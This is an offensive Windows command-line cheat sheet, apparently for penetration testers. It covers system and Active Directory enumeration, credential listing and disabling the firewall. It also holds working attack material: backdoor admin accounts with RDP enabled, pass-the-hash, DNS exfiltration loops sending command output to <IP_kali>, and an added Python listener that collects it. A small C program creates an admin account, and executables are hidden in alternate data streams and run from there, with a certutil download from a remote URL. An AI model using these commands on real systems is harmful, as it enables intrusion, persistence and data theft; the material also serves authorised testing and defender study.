```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
```
Note: wmic is deprecated and is not installed by default on recent Windows 11 builds; where it is missing, the same data is available from PowerShell's Get-CimInstance.
Environment
```bash
set #List all environment variables
```
Some environment variables worth highlighting:

- COMPUTERNAME: name of the computer
- TEMP/TMP: temporary folder
- USERNAME: your user name
- HOMEPATH/USERPROFILE: home directory
- windir: C:\Windows
- OS: Windows OS
- LOGONSERVER: name of the domain controller that authenticated this session
- USERDNSDOMAIN: domain name to use with DNS
- USERDOMAIN: NetBIOS name of the domain
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM #Export, then grep the file from a Unix shell for tasks running as SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of running services
sc query state= all #Include stopped services too
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
Domain information
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller (prints every variable starting with "log")
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers

# Users (dsquery is only present when the AD DS tools / RSAT are installed)
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 user
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domain controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"DOMAIN_NAME\"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #List of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
Logs and Events
```bash
#Make a security query using other credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
Users and Groups
Users
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user [username] [password] /add #Create user

# Other users logged
qwinsta #Anyone else logged in?

#Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```
Groups
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belong to the group
```
List sessions
```bash
qwinsta
klist sessions
```
Password policy
```bash
net accounts
```
Credentials
```bash
cmdkey /list #List credentials
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll,KRShowKeyMgr #You need graphical access
```
Persistence with users
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them in local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
Network
Interfaces, Routes, Ports, Hosts and DNS cache
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Known hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
Firewall
```bash
netsh firewall show state # FW info, open ports (the "netsh firewall" context is the legacy one, deprecated in favour of "netsh advfirewall")
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Turn On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Remote Assistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49 #Pass-the-hash over RDP only works if Restricted Admin mode is enabled on the target
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
Shares
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive bare list (no headers or summaries)
time #Get current time
date #Get current date
shutdown /r /t 0 #Reboot now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Remove Hidden

#Give full control over a file that you own (the /e /p switches belong to the old cacls tool; icacls uses /grant and /remove)
icacls <FILE_PATH> /grant <USERNAME>:F /t
icacls <FILE_PATH> /remove <USERNAME> /t #Remove the permission

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more < file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
Bypass Char Blacklisting
```bash
echo %HOMEPATH:~6,-11% #Substring of an env var: from offset 6, stopping 11 chars before the end (yields "\" for a HOMEPATH of the right length)
who^ami #whoami (a caret outside quotes escapes the next char and is dropped)
```
DOSfuscation
Generate an obfuscated CMD line
```bash
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
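The defender's side of the two tricks above (the `%VAR:~start,len%` substring expansion from "Bypass Char Blacklisting" and the caret escaping that DOSfuscation layers on top): an added example, not code from the original cheat sheet or from Invoke-DOSfuscation, that resolves percent expansion and carets in cmd's own order so an obfuscated command line can be read back. The `SAMPLE_ENV` values are constructed for the demo, not taken from a real host.

```python
import re

# Added example (not from the original cheat sheet): resolve the cmd.exe tricks
# shown above, caret escaping (who^ami) and %VAR:~start,len% / %VAR:str=rep%
# expansion, so a defender can read what an obfuscated command line really runs.

SUBSTR_RE = re.compile(r"%([^%:=]+):~(-?\d+)(?:,(-?\d+))?%")
SUBST_RE = re.compile(r"%([^%:=]+):(\*?)([^=%]+)=([^%]*)%")
PLAIN_RE = re.compile(r"%([^%:]+)%")


def cmd_substring(value: str, start: int, length=None) -> str:
    """%VAR:~start,len% semantics: negative start counts from the end, negative
    len stops that many characters before the end, missing len runs to the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        end = n
    elif length < 0:
        end = max(n + length, 0)
    else:
        end = start + length
    return value[start:end]


def cmd_substitute(value: str, pattern: str, rep: str, wildcard: bool) -> str:
    """%VAR:str=rep% replaces every case-insensitive match; %VAR:*str=rep%
    replaces everything up to and including the first match."""
    if wildcard:
        idx = value.lower().find(pattern.lower())
        return value if idx < 0 else rep + value[idx + len(pattern):]
    return re.sub(re.escape(pattern), lambda _m: rep, value, flags=re.IGNORECASE)


def expand_variables(cmdline: str, env: dict) -> str:
    """Phase 1 of cmd parsing: percent expansion. Variable names are case-insensitive;
    undefined variables are left untouched, as at an interactive prompt."""
    lookup = {k.lower(): v for k, v in env.items()}

    def sub_substr(m):
        value = lookup.get(m.group(1).lower())
        if value is None:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(value, int(m.group(2)), length)

    def sub_replace(m):
        value = lookup.get(m.group(1).lower())
        if value is None:
            return m.group(0)
        return cmd_substitute(value, m.group(3), m.group(4), m.group(2) == "*")

    def sub_plain(m):
        value = lookup.get(m.group(1).lower())
        return m.group(0) if value is None else value

    cmdline = SUBSTR_RE.sub(sub_substr, cmdline)
    cmdline = SUBST_RE.sub(sub_replace, cmdline)
    return PLAIN_RE.sub(sub_plain, cmdline)


def strip_carets(cmdline: str) -> str:
    """Phase 2: a caret outside double quotes escapes the next character and is
    dropped; inside quotes it is literal. An escaped quote does not open a string."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def deobfuscate(cmdline: str, env: dict) -> str:
    """Apply the phases in cmd's order: percent expansion first, then carets."""
    return strip_carets(expand_variables(cmdline, env))


# Constructed sample environment (values chosen for the demo, not taken from a host).
SAMPLE_ENV = {
    "HOMEPATH": r"\Users\pentester01",
    "windir": r"C:\Windows",
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
}

if __name__ == "__main__":
    for line in ("who^ami",
                 "echo %HOMEPATH:~6,-11%",
                 "%COMSPEC:~-7% /c %HOMEPATH:~6,-11%Windows%HOMEPATH:~6,-11%System32",
                 "%windir:Windows=WINNT%"):
        print(f"{line!r:<72} -> {deobfuscate(line, SAMPLE_ENV)!r}")
```

With the sample HOMEPATH of 18 characters, `%HOMEPATH:~6,-11%` collapses to a single backslash, which is why the trick lets an attacker build a path such as `\Windows\System32` without ever typing the blacklisted character; the same two phases are what any command-line logging pipeline has to replay before pattern-matching on `whoami` or similar.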
for /f tokens technique: this lets us run commands, take the first X words of each output line and send them over DNS to our server.
```bash
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one

#More complex commands (the pipe inside the for/f command must be escaped as ^|)
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Exfiltrate the enabled privileges, one query per line
```
You can also redirect the output to a file and then read it back.
```bash
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```
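The receiving end of this technique on `<IP_kali>`: an added example, not part of the original cheat sheet, of a minimal UDP/53 listener that takes each `nslookup %a.%b.%c` beacon, turns the labels of the queried name back into the tokens of the output line, and answers with a fixed A record so nslookup returns quickly and the loop keeps going. It assumes the only data of interest is the QNAME of the question section and that a real resolver is not listening on that port (binding 53 needs root). The query packet used in the demo is constructed with the block's own `build_query`, not captured from a host.

```python
import socket
import struct

# Added example (not from the original cheat sheet): a DNS "sink" for the
# for /f ... do nslookup %a.%b.%c <IP_kali> loops above. Every label of the
# queried name is one token of the command output on the victim.


def build_query(name: str, qtype: int = 1, txid: int = 0x1337) -> bytes:
    """Encode a DNS query for `name` (used here to construct demo packets)."""
    qname = b"".join(bytes([len(l)]) + l.encode("latin-1")
                     for l in name.split(".") if l) + b"\x00"
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + qname + struct.pack(">HH", qtype, 1)


def parse_question(packet: bytes):
    """Return (txid, labels, qtype, offset just past the question section)."""
    txid, _flags, qdcount = struct.unpack(">HHH", packet[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, off = [], 12
    while True:
        length = packet[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:  # a compression pointer is never valid in a fresh query name
            raise ValueError("unexpected label pointer in question")
        labels.append(packet[off:off + length].decode("latin-1"))
        off += length
    qtype, _qclass = struct.unpack(">HH", packet[off:off + 4])
    return txid, labels, qtype, off + 4


def exfil_line(labels):
    """Map the queried labels back to the output tokens, or None for noise.
    nslookup first resolves the server's own address (a PTR under in-addr.arpa /
    ip6.arpa) to print its "Server:" banner; those queries carry no data."""
    if labels[-2:] == ["in-addr", "arpa"] or labels[-2:] == ["ip6", "arpa"]:
        return None
    return " ".join(labels)


def build_response(packet: bytes, answer_ip: str = "127.0.0.1") -> bytes:
    """Answer A queries with a fixed address; other types get an empty NOERROR reply."""
    txid, _labels, qtype, qend = parse_question(packet)
    question = packet[12:qend]
    if qtype != 1:
        return struct.pack(">HHHHHH", txid, 0x8180, 1, 0, 0, 0) + question
    # name pointer to offset 12, type A, class IN, TTL 60, rdlength 4, then the address
    answer = struct.pack(">HHHIH", 0xC00C, 1, 1, 60, 4) + socket.inet_aton(answer_ip)
    return struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0) + question + answer


def serve(bind_addr: str = "0.0.0.0", port: int = 53) -> None:
    """Print one reassembled line per beacon; malformed packets are ignored."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_addr, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            _, labels, _, _ = parse_question(data)
        except (ValueError, IndexError, struct.error):
            continue
        line = exfil_line(labels)
        if line is not None:
            print(f"{peer[0]}: {line}")
        sock.sendto(build_response(data), peer)


if __name__ == "__main__":
    serve()
```

Tokens that contain characters a resolver would reject are still delivered as raw label bytes, which is why the parser decodes with latin-1 rather than validating hostnames; a `whoami` line such as `domain\user` arrives intact. Empty tokens (a line with fewer words than the `tokens=` list) simply produce shorter names.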
Calling CMD from C code
```c
#include <stdlib.h>     /* system, EXIT_SUCCESS, EXIT_FAILURE */

// When executed by an Administrator this program creates a user and then adds it to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main(void)
{
    /* system() returns the exit status of the command; stop if the user could not be created */
    if (system("net user otherAcc 0TherAcc! /add") != 0)
        return EXIT_FAILURE;
    if (system("net localgroup administrators otherAcc /add") != 0)
        return EXIT_FAILURE;
    return EXIT_SUCCESS;
}
```
Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
```bash
## Selected Examples of ADS Operations ##

### Adding Content to ADS ###
# Store an executable in an ADS of a log file (">" overwrites the stream; use ">>" to append)
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS (here a stream on the c:\temp directory itself)
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe <c:\path\to\file>

### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe

### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
```